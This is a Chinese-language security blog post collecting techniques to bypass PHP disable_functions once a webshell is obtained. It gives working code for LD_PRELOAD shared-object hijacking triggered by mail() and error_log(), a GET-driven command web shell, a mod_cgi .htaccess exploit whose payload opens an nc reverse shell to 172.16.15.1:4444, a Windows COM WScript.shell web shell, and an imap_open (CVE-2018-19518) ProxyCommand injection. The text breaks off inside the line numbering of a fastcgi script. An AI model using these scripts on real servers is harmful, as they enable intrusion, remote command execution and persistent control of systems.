<!DOCTYPE html>


<html lang="en">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    绕过DisFunc小技巧 |  
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

<link rel="alternate" href="/atom.xml" title="Anti-Genemits" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-绕过DisFunc小技巧"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  绕过DisFunc小技巧
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/10/13/%E7%BB%95%E8%BF%87DisFunc%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="article-date">
  <time datetime="2020-10-13T11:45:42.000Z" itemprop="datePublished">2020-10-13</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">4.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">23 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="绕过DisFunc的常见小技巧"><a href="#绕过DisFunc的常见小技巧" class="headerlink" title="绕过DisFunc的常见小技巧"></a>绕过DisFunc的常见小技巧</h1><p>解析webshell命令不能执行时的三大情况</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">一是 php.ini 中用 disable_functions 指示器禁用了 system()、exec() 等等这类命令执行的相关函数；</span><br><span class="line">二是 web 进程运行在 rbash 这类受限 shell 环境中</span><br><span class="line">三是 WAF 拦劫</span><br><span class="line">区别在于，1时什么命令都无法执行，2.3时部分命令可以执行</span><br></pre></td></tr></table></figure>

<p>绕过disfunc的常用手法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">第一种，攻击后端组件，寻找存在命令注入的、web 应用常用的后端组件，如，ImageMagick 的魔图漏洞、bash 的破壳漏洞；</span><br><span class="line">第二种，寻找未禁用的漏网函数，常见的执行命令的函数有 system()、exec()、shell_exec()、passthru()，偏僻的 popen()、proc_open()、pcntl_exec()，逐一尝试，或许有漏网之鱼；</span><br><span class="line">第三种，mod_cgi 模式，尝试修改 .htaccess，调整请求访问路由，绕过 php.ini 中的任何限制；</span><br><span class="line">第四种，利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so，达到执行系统命令的效果。</span><br></pre></td></tr></table></figure>



<h2 id="一、LD-PRELOAD-amp-putenv"><a href="#一、LD-PRELOAD-amp-putenv" class="headerlink" title="一、LD_PRELOAD &amp; putenv()"></a>一、LD_PRELOAD &amp; putenv()</h2><h3 id="1-原理解析"><a href="#1-原理解析" class="headerlink" title="1.原理解析"></a>1.原理解析</h3><p>详细原理文章:<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/175403%E9%A3%98%E9%9B%B6%E5%A4%A7%E5%B8%88%E5%82%85%E7%9A%84%E6%96%87%E7%AB%A0">https://www.anquanke.com/post/id/175403飘零大师傅的文章</a></p>
<p>LD_PRELOAD</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.</span><br></pre></td></tr></table></figure>

<p>即LD_PRELOAD这个环境变量指定路径的文件，会在其他文件被调用前，最先被调用</p>
<p>而putenv可以设置环境变量，两者搭配干活不累，注意这是<strong>暂时性的环境变量的设置，仅在会话期间起作用</strong></p>
<p>首先这道题的大致原理就是，像<code>mail</code>这一类的函数在调用的时候，会调研系统的动态链接库，我们通过LD_PRELOAD进行环境变量的设置，将该函数本应该调用的动态链接库改成我们制作的恶意文件，从而达到进行执行我们想执行的函数的作用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">利用漏洞控制 web 启动新进程 a.bin（即便进程名无法让我随意指定），a.bin 内部调用系统函数 b()，b() 位于系统共享对象 c.so 中，所以系统为该进程加载共 c.so，我想法在 c.so 前优先加载可控的 c_evil.so，c_evil.so 内含与 b() 同名的恶意函数，由于 c_evil.so 优先级较高，所以，a.bin 将调用到 c_evil.so 内 b() 而非系统的 c.so 内 b()，同时，c_evil.so 可控，达到执行恶意代码的目的。基于这一思路，将突破 disable_functions 限制执行操作系统命令这一目标，大致分解成几步在本地推演：查看进程调用系统函数明细、操作系统环境下劫持系统函数注入代码、找寻内部启动新进程的 PHP 函数、PHP 环境下劫持系统函数注入代码。</span><br></pre></td></tr></table></figure>

<p>这样我们呢就可以进行我们的骚操作了</p>
<p><img src="https://i.loli.net/2020/10/13/lcypLN9eDZngFhk.png"></p>
<p>这样我们进行对已有的常见的函数进行trace来看一下</p>
<p><img src="https://i.loli.net/2020/10/13/kyY2Mr7jxhF4dX6.png"></p>
<p>对于<code>/usr/sbin/sendmail</code>可以查到很多他调用的函数，比如其中的<code>getuid</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">运行 nm -D &#x2F;usr&#x2F;bin&#x2F;id 2&gt;&amp;1 或 readelf -Ws &#x2F;usr&#x2F;bin&#x2F;id 可查看该程序可能调用的系统 API 明细：</span><br><span class="line">man 2 getuid 查看函数原型</span><br><span class="line">印象中，处理图片、请求网页、发送邮件等三类场景中可能存在我想要的函数，我得逐一验证。</span><br><span class="line">处理图片，通常调用 PHP 封装的 ImageMagick 库，新建 image.php，调用 Imagick()</span><br><span class="line">请求网页，新建 http.php，调用 curl_init()：</span><br></pre></td></tr></table></figure>

<p>然后写一个hack.so</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">void payload() &#123;</span><br><span class="line">        system(&quot;ls &#x2F; &gt; &#x2F;tmp&#x2F;sky&quot;);</span><br><span class="line">&#125;</span><br><span class="line">int geteuid() </span><br><span class="line">&#123;</span><br><span class="line">    if (getenv(&quot;LD_PRELOAD&quot;) &#x3D;&#x3D; NULL) &#123; return 0; &#125;</span><br><span class="line">    unsetenv(&quot;LD_PRELOAD&quot;);</span><br><span class="line">    payload();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC hack.c -o hack</span><br><span class="line">gcc --share hack -o hack.so</span><br></pre></td></tr></table></figure>

<p>然后运行脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">putenv(&quot;LD_PRELOAD&#x3D;.&#x2F;hack.so&quot;);</span><br><span class="line">mail(&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>就可以看见</p>
<p><img src="https://i.loli.net/2020/10/13/DWS412EPs8fRpxG.png"></p>
<p>发现确实执行相关的命令，这是毫无悬念的。</p>
<p>这样的话利用起来是不是就没有什么难度了，同样可以使用其他相同的函数进行操作。</p>
<h3 id="改进版"><a href="#改进版" class="headerlink" title="改进版"></a>改进版</h3><p>GCC 有个 C 语言扩展修饰符 <strong>attribute</strong>((constructor))，可以让由它修饰的函数在 main() 之前执行，若它出现在共享对象中时，那么一旦共享对象被系统加载，立即将执行 <strong>attribute</strong>((constructor)) 修饰的函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#define _GNU_SOURCE</span><br><span class="line"></span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys&#x2F;types.h&gt;</span><br><span class="line">__attribute__ ((__constructor__)) void preloadme (void)</span><br><span class="line">&#123;</span><br><span class="line">    unsetenv(&quot;LD_PRELOAD&quot;);</span><br><span class="line">    const char* cmdline &#x3D; getenv(&quot;EVIL_CMDLINE&quot;);</span><br><span class="line">    system(cmdline);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt; &lt;b&gt;example&lt;/b&gt;: http://site.com/bypass_disablefunc.php?cmd=pwd&amp;outpath=/tmp/xx&amp;sopath=/var/www/bypass_disablefunc2.so  &lt;/p&gt;&quot;</span>;</span><br><span class="line">    $cmd = $_GET[<span class="string">&quot;cmd&quot;</span>];</span><br><span class="line">    $out_path = $_GET[<span class="string">&quot;outpath&quot;</span>];</span><br><span class="line">    $evil_cmdline = $cmd . <span class="string">&quot; &gt; &quot;</span> . $out_path . <span class="string">&quot; 2&gt;&amp;1&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt; &lt;b&gt;cmdline&lt;/b&gt;: &quot;</span> . $evil_cmdline . <span class="string">&quot;&lt;/p&gt;&quot;</span>;</span><br><span class="line">    putenv(<span class="string">&quot;EVIL_CMDLINE=&quot;</span> . $evil_cmdline);</span><br><span class="line">    $so_path = $_GET[<span class="string">&quot;sopath&quot;</span>];</span><br><span class="line">    putenv(<span class="string">&quot;LD_PRELOAD=&quot;</span> . $so_path);</span><br><span class="line">    mail(<span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt; &lt;b&gt;output&lt;/b&gt;: &lt;br /&gt;&quot;</span> . nl2br(file_get_contents($out_path)) . <span class="string">&quot;&lt;/p&gt;&quot;</span>; </span><br><span class="line">    unlink($out_path);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>从环境变量 EVIL_CMDLINE 中接收 bypass_disablefunc.php 传递过来的待执行的命令行。</p>
<p>根据目标架构编译成不同版本，在 x64 的环境中编译，若不带编译选项则默认为 x64，若要编译成 x86 架构需要加上 -m32 选项</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#define _GNU_SOURCE</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys&#x2F;types.h&gt;</span><br><span class="line"></span><br><span class="line">__attribute__ ((__constructor__)) void angel (void)&#123;</span><br><span class="line">    unsetenv(&quot;LD_PRELOAD&quot;);</span><br><span class="line">    system(&quot;ls&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中<code>__attribute__ ((__constructor__))</code>有如下说明</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.It&#39;s run when a shared library is loaded, typically during program startup.</span><br><span class="line">2.That&#39;s how all GCC attributes are; presumably to distinguish them from function calls.</span><br><span class="line">3.The destructor is run when the shared library is unloaded, typically at program exit.</span><br></pre></td></tr></table></figure>

<p>意思就是这个函数会在evil shared library load上后，就会触发这个函数，反正就是特别早的触发。在实际利用中，注意找到那个<code>开启子进程</code>的大宝贝。</p>
<h3 id="2-利用"><a href="#2-利用" class="headerlink" title="2.利用"></a>2.利用</h3><p>mail函数，error函数以及关键函数未被ban，都是通过send_mail命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">putenv(&quot;LD_PRELOAD&#x3D;.&#x2F;alex.so&quot;);</span><br><span class="line">error_log(&quot;alex&quot;,1,&quot;&quot;,&quot;&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="二、mod-cgi-模式"><a href="#二、mod-cgi-模式" class="headerlink" title="二、mod_cgi 模式"></a>二、mod_cgi 模式</h2><p>利用cgi程序可以执行命令这一点来执行系统命令,disable_functions也没办法.</p>
<p>临时允许一个目录可以执行cgi程序并且使得服务器将自定义的后缀解析为cgi程序,则可以在目的目录下使用htaccess文件进行配置,如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Options +ExecCgi</span><br><span class="line">AddHandler cgi-script *.dazzle</span><br></pre></td></tr></table></figure>

<p>要求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">apache且运行mod_cgi模式</span><br><span class="line">web目录可写</span><br><span class="line">允许.htaccess生效</span><br><span class="line">在.htaccess 中添加以下内容，指定.dazzle为结尾的文件为CGI脚本程序并且允许本目录执行，我们只要同时上传一个.dazzle的shell就可以了。</span><br></pre></td></tr></table></figure>

<p>exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$cmd &#x3D; &quot;nc -c &#39;&#x2F;bin&#x2F;bash&#39; 172.16.15.1 4444&quot;; &#x2F;&#x2F;command to be executed</span><br><span class="line">$shellfile &#x3D; &quot;#!&#x2F;bin&#x2F;bash\n&quot;; &#x2F;&#x2F;using a shellscript</span><br><span class="line">$shellfile .&#x3D; &quot;echo -ne \&quot;Content-Type: text&#x2F;html\\n\\n\&quot;\n&quot;; &#x2F;&#x2F;header is needed, otherwise a 500 error is thrown when there is output</span><br><span class="line">$shellfile .&#x3D; &quot;$cmd&quot;; &#x2F;&#x2F;executing $cmd</span><br><span class="line">function checkEnabled($text,$condition,$yes,$no) &#x2F;&#x2F;this surely can be shorter</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;$text: &quot; . ($condition ? $yes : $no) . &quot;&lt;br&gt;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line">if (!isset($_GET[&#39;checked&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">    @file_put_contents(&#39;.htaccess&#39;, &quot;\nSetEnv HTACCESS on&quot;, FILE_APPEND); &#x2F;&#x2F;Append it to a .htaccess file to see whether .htaccess is allowed</span><br><span class="line">    header(&#39;Location: &#39; . $_SERVER[&#39;PHP_SELF&#39;] . &#39;?checked&#x3D;true&#39;); &#x2F;&#x2F;execute the script again to see if the htaccess test worked</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    $modcgi &#x3D; in_array(&#39;mod_cgi&#39;, apache_get_modules()); &#x2F;&#x2F; mod_cgi enabled?</span><br><span class="line">    $writable &#x3D; is_writable(&#39;.&#39;); &#x2F;&#x2F;current dir writable?</span><br><span class="line">    $htaccess &#x3D; !empty($_SERVER[&#39;HTACCESS&#39;]); &#x2F;&#x2F;htaccess enabled?</span><br><span class="line">        checkEnabled(&quot;Mod-Cgi enabled&quot;,$modcgi,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">        checkEnabled(&quot;Is writable&quot;,$writable,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">        checkEnabled(&quot;htaccess working&quot;,$htaccess,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">    if(!($modcgi &amp;&amp; $writable &amp;&amp; $htaccess))</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;Error. All of the above must be true for the script to work!&quot;; &#x2F;&#x2F;abort if not</span><br><span class="line">    &#125;</span><br><span class="line">    else</span><br><span class="line">    &#123;</span><br><span class="line">        checkEnabled(&quot;Backing up .htaccess&quot;,copy(&quot;.htaccess&quot;,&quot;.htaccess.bak&quot;),&quot;Suceeded! Saved in .htaccess.bak&quot;,&quot;Failed!&quot;); &#x2F;&#x2F;make a backup, cause you never know.</span><br><span class="line">        checkEnabled(&quot;Write .htaccess file&quot;,file_put_contents(&#39;.htaccess&#39;,&quot;Options +ExecCGI\nAddHandler cgi-script .dizzle&quot;),&quot;Succeeded!&quot;,&quot;Failed!&quot;); &#x2F;&#x2F;.dizzle is a nice extension</span><br><span class="line">        checkEnabled(&quot;Write shell file&quot;,file_put_contents(&#39;shell.dizzle&#39;,$shellfile),&quot;Succeeded!&quot;,&quot;Failed!&quot;); &#x2F;&#x2F;write the file</span><br><span class="line">        checkEnabled(&quot;Chmod 777&quot;,chmod(&quot;shell.dizzle&quot;,0777),&quot;Succeeded!&quot;,&quot;Failed!&quot;); &#x2F;&#x2F;rwx</span><br><span class="line">        echo &quot;Executing the script now. Check your listener &lt;img src &#x3D; &#39;shell.dizzle&#39; style &#x3D; &#39;display:none;&#39;&gt;&quot;; &#x2F;&#x2F;call the script</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="三、系统组件绕过"><a href="#三、系统组件绕过" class="headerlink" title="三、系统组件绕过"></a>三、系统组件绕过</h2><p>Window com组件(php 5.4及以下默认开启)(高版本扩展要自己添加）<br>添加方法：<br>        在php相应版本下ext查找<code>php_com_dotnet.dll</code>,一般都会有。没有的话，下载添加到ext目录下。<br>查看php.ini中是否已经开启了com.allow_dcom = true</p>
<p>然后在查找php.ini里面查找下extension=php_com_dotnet.dll把前面的#号或;号去掉。<br>如果没有找到，添加上extension=php_com_dotnet.dll即可。然后重启apache。然后查看phpinfo();</p>
<p>exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$command&#x3D;$_GET[&#39;a&#39;];</span><br><span class="line">$wsh &#x3D; new COM(&#39;WScript.shell&#39;); &#x2F;&#x2F; 生成一个COM对象　Shell.Application也能</span><br><span class="line">$exec &#x3D; $wsh-&gt;exec(&quot;cmd &#x2F;c &quot;.$command); &#x2F;&#x2F;调用对象方法来执行命令</span><br><span class="line">$stdout &#x3D; $exec-&gt;StdOut();</span><br><span class="line">$stroutput &#x3D; $stdout-&gt;ReadAll();</span><br><span class="line">echo $stroutput;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="四、利用IMAP-OPEN-CVE-2018-19518"><a href="#四、利用IMAP-OPEN-CVE-2018-19518" class="headerlink" title="四、利用IMAP_OPEN(CVE-2018-19518)"></a>四、利用IMAP_OPEN(CVE-2018-19518)</h2><p>Php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh来代替rsh的功能（也就是说，在debian系列系统中，执行rsh命令实际执行的是ssh命令）</p>
<p>Ssh命令中可以通过设置<code>-oProxyCommand=</code>来调用第三方命令，攻击者通过注入注入这个参数，最终将导致命令执行漏洞。即使是ssh连接失败了，但是命令还是能执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$exp &#x3D; &quot;echo test!test! &gt; &#x2F;tmp&#x2F;test&quot;;</span><br><span class="line">$base64_exp &#x3D; base64_encode($exp);</span><br><span class="line">$server &#x3D; &quot;x -oProxyCommand&#x3D;echo\t$&#123;base64_exp&#125;|base64\t-d|sh&#125;&quot;;</span><br><span class="line">imap_open(&#39;&#123;&#39;.$server.&#39;:143&#x2F;imap&#125;INBOX&#39;, &#39;&#39;, &#39;&#39;) or die(&quot;\n\nError: &quot;.imap_last_error());</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>







<p>最后附上一个fastcgi的脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span 